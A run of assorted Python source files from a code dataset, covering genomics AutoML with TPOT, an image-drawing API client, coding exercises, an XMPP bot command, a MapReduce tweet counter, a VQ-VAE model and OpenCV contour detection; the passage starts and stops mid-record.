#uni.par_run(numTicks=10000)","sub_path":"Simulator.py","file_name":"Simulator.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"268609078","text":"import os\nfrom itertools import combinations\nfrom pathlib import Path\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\nfrom tpot import TPOTRegressor\nfrom tpot.config import regressor_config_dict_light\n\n\ndef load_exome_data(data_folder, residuals):\n \"\"\"Load exome genotype data\"\"\"\n # Load Exome Data\n df_exome = pd.read_csv(\n f\"{data_folder}/Biobin_WES_3647_413_merged_full_SKAT_linear_bin_gene_MB-p_efvcnsgr2w48-bins.csv\")\n # Drop 1st 9 rows (not actual samples) and the existing phenotype column\n df_exome = df_exome.loc[9:, :].drop('p_efvcnsgr2w48', axis='columns')\n\n # Convert Exome IDs\n df_phenos = pd.read_csv(\n f\"{data_folder}/2017_12_12_WES_ID_map+2016_11_13_ACTG_MASTER_phenos_commonRPIDandVantageID.txt\",\n sep=\"\\t\")\n id_dict = df_phenos[['VANTAGENGSID', 'rpid']].set_index('VANTAGENGSID').to_dict()['rpid']\n df_exome['ID'] = df_exome['ID'].apply(lambda s: id_dict[s])\n df_exome = df_exome.set_index(\"ID\")\n\n # Log\n print(f\"Exome data: Loaded {len(df_exome):,} rows and {len(list(df_exome)):,} regions\")\n\n # Match residuals to data by ID\n exome = pd.merge(left=residuals, right=df_exome, how='inner', left_index=True, right_index=True)\n X_exome = exome.drop(residuals.name, axis='columns')\n y_exome = exome[residuals.name]\n exome_samples = len(y_exome)\n print(f\"{exome_samples:,} samples in exome data\")\n\n return X_exome, y_exome\n\n\ndef score_pipeline(pipeline, X, y, name, output_folder):\n \"\"\"Test the pipeline with data\"\"\"\n mse_scores = cross_val_score(pipeline, X, y, scoring='neg_mean_squared_error', cv=5)\n r2_scores = cross_val_score(pipeline, X, y, scoring='r2', cv=5)\n print(\"5-fold Cross-Validation Scores\")\n print(f\"\\tNegative MSE = {mse_scores.mean()} Average ({', '.join([str(n) for n in mse_scores])})\")\n print(f\"\\tR^2 = {r2_scores.mean()} Average ({', '.join([str(n) for n in r2_scores])})\")\n\n # Get CV Predictions\n results = pd.DataFrame({'predicted': cross_val_predict(pipeline, X, y, cv=5),\n 'actual': y})\n\n # Plot CV Predictions\n ax = sns.scatterplot(x=\"actual\", y=\"predicted\", data=results, alpha=0.5)\n\n # Add diagonal that is +/- 10% of the min/max range\n min_range = results[['actual', 'predicted']].min(axis=1).min() * 0.9\n max_range = results[['actual', 'predicted']].max(axis=1).max() * 1.1\n ax.plot([min_range, max_range], [min_range, max_range], lw=1, color='black')\n\n # Title\n ax.set_title(name)\n\n # Save\n plt.savefig(output_folder + f\"/{name}.png\")\n print(f\"Saved {name} plot\")\n plt.clf() # Clear in case more plots are made later\n\nexisting_file = click.Path(exists=True, file_okay=True, dir_okay=False, readable=True)\n\n@click.command()\n@click.argument('phenotype', type=click.STRING)\n@click.option('--population', type=click.INT, default=100)\n@click.option('--generations', type=click.INT, default=None)\n@click.option('--gene_set_file', type=existing_file, default=None) # For FSS\n@click.option('--gene_set_count', type=click.INT, default=None) # For FSS\n@click.option('--random_seed', type=click.INT, default=1855)\n@click.option('--max_time_mins', type=click.INT, default=None)\n@click.option('--checkpoint_folder', type=click.Path(exists=True, file_okay=False, dir_okay=True, writable=True))\n@click.option('--output_folder', type=click.Path(exists=True, file_okay=False, dir_okay=True, writable=True), default=\".\")\ndef run_analysis(phenotype, population, generations, gene_set_file, gene_set_count, random_seed, max_time_mins, checkpoint_folder, output_folder):\n # Either generations or max_time_mins must be specified\n if generations is None and max_time_mins is None:\n raise ValueError(\"Either 'generations' or 'max_time_mins' must be specified\")\n\n # Folders\n current_folder = str(Path(os.path.realpath(__file__)).parent) # folder containing this script\n data_folder = current_folder + \"/data\"\n\n # Load residuals\n residuals_file = data_folder + f\"/residuals/{phenotype}_residuals.txt\"\n residuals = pd.read_csv(residuals_file, sep=\"\\t\", index_col='ID', squeeze=True)\n print(\"Loaded residuals\")\n\n # Load genotype data\n X_exome, y_exome = load_exome_data(data_folder, residuals)\n print(\"Loaded genotype data\")\n\n # Load fss options\n if gene_set_file is None:\n raise ValueError(\"A gene_set_file must be specified when using FSS\")\n else:\n gene_set_file = str(gene_set_file) # Must be string when passed to TPOT\n if gene_set_count is None:\n raise ValueError(\"A gene_set_count must be specified when using FSS\")\n available_subset_num = len(open(gene_set_file).readlines())\n sel_subset = list(range(available_subset_num))\n if gene_set_count > 1:\n # Update sel_subset to be all possible combinations\n sel_subset = list(combinations(sel_subset, gene_set_count))\n fss_options = {'subset_list': [gene_set_file],\n 'sel_subset': sel_subset}\n regressor_config_dict_light['tpot.builtins.FeatureSetSelector'] = fss_options\n\n # Print what settings are being used\n print(f\"Running TPOT\")\n print(f\"\\tPhenotype = {residuals.name}\")\n print(f\"\\tPopulation = {population}\")\n # FSS\n print(f\"\\tFSS settings:\")\n print(f\"\\t\\tfile = {gene_set_file} (contains {available_subset_num:,} sets)\")\n print(f\"\\t\\t{gene_set_count} set(s) chosen at a time ({len(fss_options['sel_subset']):,} combinations)\")\n\n # Define template\n template = 'FeatureSetSelector-Transformer-Regressor'\n\n # Optimize Pipeline\n pipeline_optimizer = TPOTRegressor(generations=generations,\n population_size=population,\n max_time_mins=max_time_mins,\n verbosity=2,\n config_dict=regressor_config_dict_light,\n template=template,\n periodic_checkpoint_folder=checkpoint_folder,\n early_stop=None,\n random_state=random_seed,\n n_jobs=-1)\n print(\"=\" * 30)\n print(\"Starting Training...\")\n pipeline_optimizer.fit(X_exome, y_exome)\n\n # Save pipeline\n pipeline_optimizer.export(output_folder + f\"/{phenotype}_pipeline.py\")\n\n # Score pipeline and save results\n pipeline = pipeline_optimizer.fitted_pipeline_\n score_pipeline(pipeline, X_exome, y_exome, name=f\"exome_{phenotype}_results\", output_folder=output_folder)\n\n\nif __name__ == '__main__':\n run_analysis()\n","sub_path":"scripts/run_tpot_exome_residuals.py","file_name":"run_tpot_exome_residuals.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"491943840","text":"import os\nimport requests\nimport json\n\n\nAPI_URL = 'http://127.0.0.1:8001/'\nMAX_RETRIES = 60\n\n\ndef draw(filename):\n values = {\n \"rectangles\": [\n {\n \"x\": 100,\n \"y\": 100,\n \"w\": 100,\n \"h\": 200\n },\n {\n \"x\": 300,\n \"y\": 300,\n \"w\": 100,\n \"h\": 200\n },\n {\n \"x\": 200,\n \"y\": 200,\n \"w\": 100,\n \"h\": 200\n }\n ]\n }\n\n files = {'file': (filename, open(filename, 'rb'), 'image/jpeg', {})}\n json_str = json.dumps(values)\n response = requests.post(API_URL + \"drawing/draw\", files=files, data={\"json\": json_str}, stream=True)\n if response.status_code == 200:\n with open('output.jpg', 'wb+') as f:\n f.write(response.raw.data)\n else:\n print(response.status_code, response.reason)\n\n\nif __name__ == '__main__':\n draw('input.jpg')\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247293466","text":"\"\"\"\nFrom: https://oj.leetcode.com/problems/merge-intervals/\nAuthor: Jing Zhou\nDate: Sep 12, 2014\nThought: Sort then merge, easy\nTags: sort, list, sorted\n\"\"\"\n\n\n\n# Definition for an interval.\n# class Interval:\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution:\n # @param intervals, a list of Interval\n # @return a list of Interval\n def merge(self, intervals):\n if not intervals or len(intervals) == 1:\n return intervals\n # or use key = lambda x: x.start\n intervals = sorted(intervals, key=operator.attrgetter('start'))\n res = [intervals[0]]\n for i in range(1, len(intervals)):\n if intervals[i].start <= res[-1].end:\n res[-1].end = max(res[-1].end, intervals[i].end)\n else:\n res.append(intervals[i])\n return res\n","sub_path":"week24/Jing/p_merge_interval.py","file_name":"p_merge_interval.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"326898418","text":"def has_negatives(a):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n cache = {}\n results = []\n for i in a:\n\n cache[i] = i\n \n if i and -i in cache:\n if i > 0:\n results.append(i)\n else:\n results.append(-i)\n \n return results\n\n\nif __name__ == \"__main__\":\n print(has_negatives([-1, -2, 1, 2, 3, 4, -4]))\n","sub_path":"hashtables/ex4/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"568067006","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom collections import defaultdict\nfrom itertools import chain\nfrom scipy.spatial.distance import cosine\nfrom scipy.stats import spearmanr\n\nfrom wikipedia2vec import Wikipedia2Vec\n\nENTITY_CATEGORIES = {\n 'it_companies': ['Apple Inc.', 'Google', 'Facebook', 'Microsoft', 'IBM'],\n 'celebrities': ['Angelina Jolie', 'Brad Pitt', 'Johnny Depp', 'Jennifer Aniston', 'Leonardo DiCaprio'],\n 'video_games': ['Grand Theft Auto IV', 'Quake (video game)', 'Deus Ex (series)', 'Guitar Hero (video game)', 'Max Payne'],\n 'tv_series': ['The Sopranos', 'The A-Team', 'Futurama', 'The Wire', 'Mad Men'],\n 'chuck_norris': ['Chuck Norris'],\n}\n\n\ndef evaluate_on_Kore(w, dataset_file=\"web/datasets/rankedrelatedentities.txt\"):\n dataset_obj = parse_dataset(dataset_file)\n\n results = defaultdict(list)\n category_mapping = {\n e: c for (c, l) in ENTITY_CATEGORIES.items() for e in l}\n\n for (title1, title_list) in dataset_obj.items():\n pred = []\n title_pairs = [title1]\n\n title1 = convert_title(title1).lower()\n try:\n vec1 = w[title1]\n except KeyError:\n print('Missing entity:' + title1)\n pred.append(0.0)\n continue\n\n for title2 in title_list:\n title_pairs.append(title2)\n title2 = convert_title(title2).lower()\n try:\n vec2 = w[title2]\n except KeyError:\n print('Missing entity:' + title2)\n pred.append(0.0)\n continue\n\n score = 1.0 - cosine(vec1, vec2)\n pred.append(score)\n\n correct = list(reversed(range(len(pred))))\n results[category_mapping[title_pairs[0]]].append(\n spearmanr(correct, pred)[0])\n\n print(results)\n\n return results\n\n\ndef convert_title(title):\n title_tokens = title.split()\n if len(title_tokens) == 1:\n return \"ENTITY/\" + title_tokens[0]\n else:\n return \"ENTITY/\" + \"_\".join(title_tokens)\n\n\ndef parse_dataset(dataset_file_path):\n target = None\n dataset_obj = defaultdict(list)\n f = open(dataset_file_path)\n dataset_file = f.readlines()\n for line in dataset_file:\n line = line.rstrip()\n if line.startswith('\\t'):\n dataset_obj[target].append(line[1:])\n else:\n target = line\n\n return dataset_obj\n","sub_path":"web/kore_evaluate.py","file_name":"kore_evaluate.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327102971","text":"# Napisz program, który wczytuje liczbę całkowitą, a następnie na konsolę wypisuje\n# w tylu liniach \"choinkę\" ze znaków `*`. Np. dla parametru 3 powinno się wypisać:\n# ​\n# ```\n# *\n# * * *\n# * * * * *\n\n\nfrom random import randint\n\nx = randint (5,10)\n\nprint(f\"\\nChoinka będzie składać się z {x} linijek.\")\n\n\n\nfor x in range(x+1):\n # print(x)\n\n i = ((x * 2) -1)\n\n tree = (i * \"* \")\n\n print(f\"{tree:^40}\")\n\n\n\n\n","sub_path":"zad_2_2.py","file_name":"zad_2_2.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"150820331","text":"import xmppUtils\n\ncommandText = 'kick'\nhelpText = 'Kick the specified user.'\n\ndef process(sender, type, args, client):\n\tcomSend = sender.getResource()\n\troom = sender.getStripped()\n\tif xmppUtils.isModerator(room, comSend):\n\t\tif len(args) > 0:\n\t\t\tsenderNick = sender.getResource()\n\t\t\txmppUtils.setRole(room, args, 'none', '...cause the kickin\\' boot has granted its powers to %s' %(comSend))","sub_path":"commands/kick.py","file_name":"kick.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"30907403","text":"# -*- coding: utf-8 -*-\n\nimport disco\nfrom disco.core import Job, result_iterator\n\ndef map(line, params):\n columns = line.split()\n party = columns[1]\n yield party, 1\n\ndef reduce(iter, params):\n from disco.util import kvgroup\n for party, counts in kvgroup(sorted(iter)):\n yield party, sum(counts)\n\nif __name__ == '__main__':\n job = Job().run(input=[\"data:tweets\"], map_reader = disco.worker.task_io.chain_reader, map=map, reduce=reduce)\n with open('TweetStats.txt', 'w') as f:\n for party_word, count in result_iterator(job.wait(show=True)):\n f.write(party_word + '\\t' + str(count) + '\\n')\n f.close()\n","sub_path":"CalculateTweetStats.py","file_name":"CalculateTweetStats.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"650427919","text":"import os\nimport tensorflow as tf\nimport math\nimport numpy as np\nfrom functools import partial\nimport VQVAE_ema_module\n\nclass CoordConv2D:\n def __init__(self, with_r = False):\n self.with_r = with_r\n def __call__(self,input):\n self.x_dim = input.shape.as_list()[2]\n self.y_dim = input.shape.as_list()[1]\n batch_size_tensor = tf.shape(input)[0]\n xy_vector = tf.ones([self.y_dim,1])\n yx_vector = tf.ones([1,self.x_dim])\n x_range = tf.reshape(tf.range(1,self.x_dim+1,1,dtype=tf.float32),[1,self.x_dim])\n y_range = tf.reshape(tf.range(1,self.y_dim+1,1,dtype=tf.float32),[self.y_dim,1])\n x_normal_range = tf.multiply(x_range,1/self.x_dim)\n y_normal_range = tf.multiply(y_range,1/self.y_dim)\n x_mat = tf.matmul(xy_vector,x_normal_range)\n y_mat = tf.matmul(y_normal_range,yx_vector)\n\n x_mat = tf.reshape(x_mat,[1,self.y_dim,self.x_dim,1])\n y_mat = tf.reshape(y_mat,[1,self.y_dim,self.x_dim,1])\n x_mats = tf.tile(x_mat,[batch_size_tensor,1,1,1])\n y_mats = tf.tile(y_mat,[batch_size_tensor,1,1,1])\n\n\n \n if self.with_r == True:\n # # orgin\n # r = ((x_mats-0.5)**2 + (y_mats-0.5)**2)\n # r = tf.sqrt(r)\n\n # I test \n r = (tf.sqrt((x_mats-0.5)**2) + tf.sqrt((y_mats-0.5)**2))\n\n input = tf.concat([input,x_mats,y_mats,r],axis=-1)\n return input\n else:\n input = tf.concat([input,x_mats,y_mats],axis=-1)\n return input\n\n\nclass MODEL:\n defalt_data_img_holder = tf.placeholder(tf.float32, [None, 72 * 2, 128 * 2, 3], \"default_data_img_holder\")\n\n def __init__(self, LR, filter_num, batch_size, latent_size, latent_base, attention_head_num):\n self.LR = LR\n self.filter_num = filter_num\n self.batch_size = batch_size\n self.latent_size = latent_size\n self.latent_base = latent_base\n self.kernel = tf.keras.initializers.glorot_normal()\n self.attention_head_num = attention_head_num\n\n global_step = tf.Variable(0, trainable=False)\n\n # learning_rate = tf.train.exponential_decay(self.LR, global_step, 10000, 0.96, staircase=True)\n learning_rate = self.LR\n\n # place holders\n # self.ori_x = tf.placeholder(tf.string, [None])\n self.ori_x = tf.placeholder(tf.float32, [None, 28,28],name=\"ori_x_holder\")\n\n self.ori_y = tf.placeholder(tf.string, [None])\n self.keep_training = tf.placeholder_with_default(True, shape=())\n # data_img_holder = tf.placeholder(tf.float32, [None, 28, 28, 1], \"default_data_img_holder\")\n # self.data_img_holder = tf.multiply(data_img_holder,1/255,\"input_regularize\")\n self.data_img_holder = tf.placeholder(tf.float32, [None, 28, 28, 1], \"default_data_img_holder\")\n self.reg_data_img_holder = self.data_img_holder/255\n\n dataset = tf.data.Dataset.from_tensor_slices(self.ori_x)\n dataset = dataset.batch(self.batch_size, drop_remainder=True)\n dataset = dataset.apply(tf.contrib.data.shuffle_and_repeat(buffer_size=10))\n dataset = dataset.prefetch(10)\n self.dataset_iter = dataset.make_initializable_iterator()\n self.dataset_prefetch = tf.reshape(self.dataset_iter.get_next(),[-1, 28, 28, 1])\n\n self.gray_data_img = self.reg_data_img_holder\n\n self.main(self.gray_data_img, training_status=self.keep_training)\n\n self.loss = self.loss_function()\n\n optimizer = tf.train.RMSPropOptimizer(learning_rate, momentum=.9, centered=True)\n\n self.train_op = optimizer.minimize(self.loss)\n\n # built reconstruct_img\n \n\n def short_cut_layer(self, enc_layer, dec_layer):\n short_cut1_H_x = tf.keras.layers.Conv2D(1, kernel_size=3, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(enc_layer)\n\n short_cut1_H_x = tf.keras.layers.Conv2D(dec_layer.shape.as_list()[-1], kernel_size=3, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(\n short_cut1_H_x)\n\n expand_dec_layer = tf.concat([short_cut1_H_x, dec_layer], axis=3)\n\n return expand_dec_layer\n\n def main(self, img, training_status):\n with tf.variable_scope(\"vea_autoencoder\", reuse=tf.AUTO_REUSE):\n # l1 output => l8 input\n # l2 output => l7 input\n # l3 output => l6 input\n # l4 output => l5 input\n\n # encoder\n\n # print(\"img:\", img)\n\n # level1\n\n # level1\n\n # img_with_Cord = CoordConv2D(with_r = False)(img)\n\n\n l1_output = tf.keras.layers.Conv2D(self.filter_num, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(img)\n l1_output = tf.keras.layers.Conv2D(self.filter_num, kernel_size=3, strides=1, activation=\"tanh\",\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l1_output)\n\n print(\"l1_output:\", l1_output)\n\n # level2\n\n l2_raw_output = tf.keras.layers.MaxPool2D(pool_size=2, padding=\"SAME\")(l1_output)\n\n\n l2_output = tf.keras.layers.Conv2D(self.filter_num * 2, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l2_raw_output)\n l2_output = tf.keras.layers.Conv2D(self.filter_num * 2, kernel_size=3, strides=1, activation=\"tanh\",\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l2_output)\n print(\"l2_output:\", l2_output)\n\n # level3\n\n l3_raw_output = tf.keras.layers.MaxPool2D(pool_size=2, padding=\"SAME\")(l2_output)\n\n l3_output = tf.keras.layers.Conv2D(self.filter_num * 3, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l3_raw_output)\n l3_output = tf.keras.layers.Conv2D(self.latent_base, kernel_size=3, strides=1, activation=\"tanh\",\n padding=\"SAME\",\n kernel_initializer=tf.initializers.he_normal())(l3_output)\n\n print(\"l3_output:\", l3_output)\n\n img_shape = l3_output.shape\n\n\n with tf.variable_scope(\"top_VQVAE\"):\n top_VQVAE_instance = VQVAE_ema_module.VQVAE(l3_output, self.latent_size, 0.25, \"top_VQVAE\")\n top_VQ_out_dict = top_VQVAE_instance.VQVAE_layer_out()\n\n top_VQ_out = top_VQ_out_dict['quantized_embd_out']\n self.top_VQ_loss = top_VQ_out_dict[\"VQ_loss\"]\n self.top_VQ_encodings = top_VQ_out_dict[\"encodings\"]\n self.top_VQ_assign_moving_avg_op = top_VQ_out_dict['assign_moving_avg_op']\n self.top_VQ_temp_decay_op = top_VQ_out_dict[\"temp_decay_op\"]\n self.top_k_idx = top_VQ_out_dict[\"top_k_idx\"]\n\n # print(\"top_VQ_out:\", top_VQ_out)\n\n # unflatten_ouput = VQ_out\n #\n # print(\"unflatten_ouput:\", unflatten_ouput)\n\n channel_reconstruct = tf.keras.layers.Dense(img_shape[-1],\n kernel_initializer=tf.keras.initializers.glorot_normal())(\n top_VQ_out)\n print(\"channel_reconstruct:\", channel_reconstruct)\n\n\n # level 4\n l4_raw_output = tf.keras.layers.Conv2DTranspose(self.filter_num * 2, kernel_size=3, strides=2, padding=\"SAME\",\n kernel_initializer=self.kernel, activation=tf.nn.tanh)(channel_reconstruct)\n\n l4_output = tf.keras.layers.Conv2D(self.filter_num * 2, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l4_raw_output)\n l4_output = tf.keras.layers.Conv2D(self.latent_base, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l4_output)\n\n resize_top_VQ_out = tf.keras.layers.UpSampling2D(2, interpolation='bilinear')(top_VQ_out)\n\n bottom_input = tf.concat([l4_output, resize_top_VQ_out], axis=3)\n\n bottom_input = tf.keras.layers.Dense(bottom_input.get_shape().as_list()[-1],activation=\"tanh\", kernel_initializer=tf.initializers.he_normal())(bottom_input)\n\n with tf.variable_scope(\"bottom_VQVAE\"):\n bottom_VQVAE_instance = VQVAE_ema_module.VQVAE(bottom_input, self.latent_size, 0.25,\n \"bottom_VQVAE\")\n bottom_VQ_out_dict = bottom_VQVAE_instance.VQVAE_layer_out()\n bottom_VQ_out = bottom_VQ_out_dict['quantized_embd_out']\n self.bottom_VQ_loss = bottom_VQ_out_dict[\"VQ_loss\"]\n self.bottom_VQ_encodings = bottom_VQ_out_dict[\"encodings\"]\n self.bottom_VQ_assign_moving_avg_op = bottom_VQ_out_dict['assign_moving_avg_op']\n self.bottom_VQ_temp_decay_op = bottom_VQ_out_dict[\"temp_decay_op\"]\n\n print(\"bottom_VQ_out:\", bottom_VQ_out)\n\n bottom_VQ_out = tf.concat([bottom_VQ_out, resize_top_VQ_out], axis=3)\n\n print(\"bottom_VQ_out:\", bottom_VQ_out)\n\n # level8\n l5_raw_output = tf.keras.layers.Conv2DTranspose(self.filter_num * 1, kernel_size=3, strides=2, padding=\"SAME\",\n kernel_initializer=self.kernel, activation=tf.nn.tanh)(bottom_VQ_out)\n\n l5_output = tf.keras.layers.Conv2D(self.filter_num * 1, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l5_raw_output)\n l5_output = tf.keras.layers.Conv2D(self.filter_num * 1, kernel_size=3, strides=1, activation=\"tanh\",\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l5_output)\n\n print(\"l5_output:\",l5_output)\n\n\n # reconstruct layer\n\n recon_out = tf.keras.layers.Conv2D(32, kernel_size=3, strides=1, padding=\"SAME\", activation=\"sigmoid\",\n kernel_initializer=self.kernel)(l5_output)\n recon_out = tf.keras.layers.Conv2D(1, kernel_size=3, strides=1, padding=\"SAME\",\n kernel_initializer=self.kernel, activation=\"sigmoid\")(recon_out)\n self.reg_recon_out = recon_out\n self.recon_output = tf.cast(tf.round(recon_out * 255), tf.float32)\n\n # print(\"seg_map:\", seg_map.shape)\n # print((\"recon_out:\", recon_out))\n\n \n\n def loss_function(self):\n # reconstruct loss\n # data_img = (self.data_img + 1) * .5 # from -1~1 to 0~1\n\n # print(\"data_img:\",data_img)\n print(\"self.recon_output:\",self.recon_output)\n\n self.reconstruct_loss = tf.reduce_mean(tf.squared_difference(self.reg_data_img_holder, self.reg_recon_out), axis=[1, 2, 3])\n\n self.logpx_z = self.reconstruct_loss\n\n return tf.reduce_mean(self.logpx_z) + self.bottom_VQ_loss + self.top_VQ_loss\n\n def oct_conv_first_layer(self, x, channel_num, alpha, kernel_size=3, activation=tf.nn.tanh):\n H_channel_num = int(channel_num * alpha // 1) # by alpha, I split channel to high freq and low freq chuncks\n L_channel_num = channel_num - H_channel_num\n\n H_x = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal(),\n activation=activation)(x)\n\n # since low freq catch the spatial stucture rather than catching detail, we use pooling on Low freq parts\n L_pooling = tf.keras.layers.AveragePooling2D(pool_size=2, strides=2, padding='SAME')(x)\n L_x = tf.keras.layers.Conv2D(L_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal(),\n activation=activation)(L_pooling)\n\n return H_x, L_x\n\n def oct_conv_block(self, H_x, L_x, channel_num, alpha, kernel_size=3, activation=tf.nn.tanh):\n H_channel_num = int(channel_num * alpha // 1) # by alpha, I split channel to high freq and low freq chuncks\n L_channel_num = channel_num - H_channel_num\n\n H2H = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(H_x)\n\n # # dilation add-on\n # H2dilation = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n # dilation_rate=2,\n # kernel_initializer=tf.keras.initializers.glorot_normal())(H_x)\n # H2H = tf.concat([H2H, H2dilation], axis=3)\n # H2H = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n # kernel_initializer=tf.keras.initializers.glorot_normal())(H2H)\n\n H2L = tf.keras.layers.AveragePooling2D(pool_size=2, strides=2, padding='SAME')(H_x)\n H2L = tf.keras.layers.Conv2D(L_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(H2L)\n\n L2L = tf.keras.layers.Conv2D(L_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(L_x)\n\n # upsampling to H freq parts size\n L2H_raw = tf.keras.layers.UpSampling2D(2, interpolation='bilinear')(L_x)\n L2H = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(L2H_raw)\n\n # # dilation add-on\n # L2dilation = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n # dilation_rate=2,\n # kernel_initializer=tf.keras.initializers.glorot_normal())(L2H_raw)\n # L2H = tf.concat([L2H, L2dilation], axis=3)\n # L2H = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n # kernel_initializer=tf.keras.initializers.glorot_normal())(L2H)\n\n return activation((H2H + L2H) / 2), activation((L2L + H2L) / 2)\n\n def oct_conv_final_layer(self, H_x, L_x, channel_num, kernel_size=3, activation=tf.nn.tanh):\n L2H = tf.keras.layers.UpSampling2D(2, interpolation='bilinear')(L_x)\n L2H = tf.keras.layers.Conv2D(channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(L2H)\n H2H = tf.keras.layers.Conv2D(channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(H_x)\n\n return activation((H2H + L2H) / 2)\n","sub_path":"VQVAE/EMA_slice_vector/VQVAE_ema_model.py","file_name":"VQVAE_ema_model.py","file_ext":"py","file_size_in_byte":15908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"644449803","text":"import sys\n\ndef calculate(h, word):\n lettersList = {}\n i = 0\n for letter in range(97, 123):\n lettersList[chr(letter)] = h[i]\n i += 1\n maxValue = 1\n for character in word:\n if lettersList[character] > maxValue:\n maxValue = lettersList[character]\n return len(word) * maxValue\nh = list(map(int, input().strip().split(' ')))\nword = input().strip()\nprint(calculate(h, word))\n","sub_path":"hackerrank/designerPDFReader.py","file_name":"designerPDFReader.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"122675258","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('FFF03A_1.jpg')\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# save image with lower quality—smaller file size\ncv2.imwrite('FFF_compressed.jpg', img, [cv2.IMWRITE_JPEG_QUALITY, 9])\n\n# read the compressed image\nimg = cv2.imread('FFF_compressed.jpg')\n# convert the colored image into gray one\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# Use Sobel kernel to find the contours\ngradX = cv2.Sobel(gray, ddepth=cv2.CV_32F, dx=1, dy=0, ksize=-1)\ngradY = cv2.Sobel(gray, ddepth=cv2.CV_32F, dx=0, dy=1, ksize=-1)\n\n# subtract the y-gradient from the x-gradient\ngradient = cv2.subtract(gradX, gradY)\ngradient = cv2.convertScaleAbs(gradient)\n\n# blur and threshold the image\nblurred = cv2.blur(gradient, (20, 20))\n(_, thresh) = cv2.threshold(blurred, 90, 255, cv2.THRESH_BINARY)\n\n# make the image closed\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (100, 100)) # (100, 100) for samples, (20,20) for videos\nclosed = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n\n# cv2.imshow('1', closed)\n\n# perform a series of erosions and dilations\nclosed = cv2.erode(closed, None, iterations=4)\nclosed = cv2.dilate(closed, None, iterations=4)\n\n# draw contour\ncontours, hierarchy= cv2.findContours(closed.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\ncnt = sorted(contours, key=cv2.contourArea, reverse=True)[0]\n\n# epsilon = 0.0001*cv2.arcLength(cnt,True)\n# approx = cv2.approxPolyDP(cnt,epsilon,True)\n# cv2.drawContours(img, [approx], -1, (0, 255, 0), 3)\n\nhull = cv2.convexHull(cnt)\n# cv2.drawContours(img, [hull], -1, (0, 255, 0), 3)\n\nmask = np.zeros_like(img)\ncv2.drawContours(mask, [hull], -1, (0, 255, 0), 3)\nout = img.copy() # Extract out the object and place into output 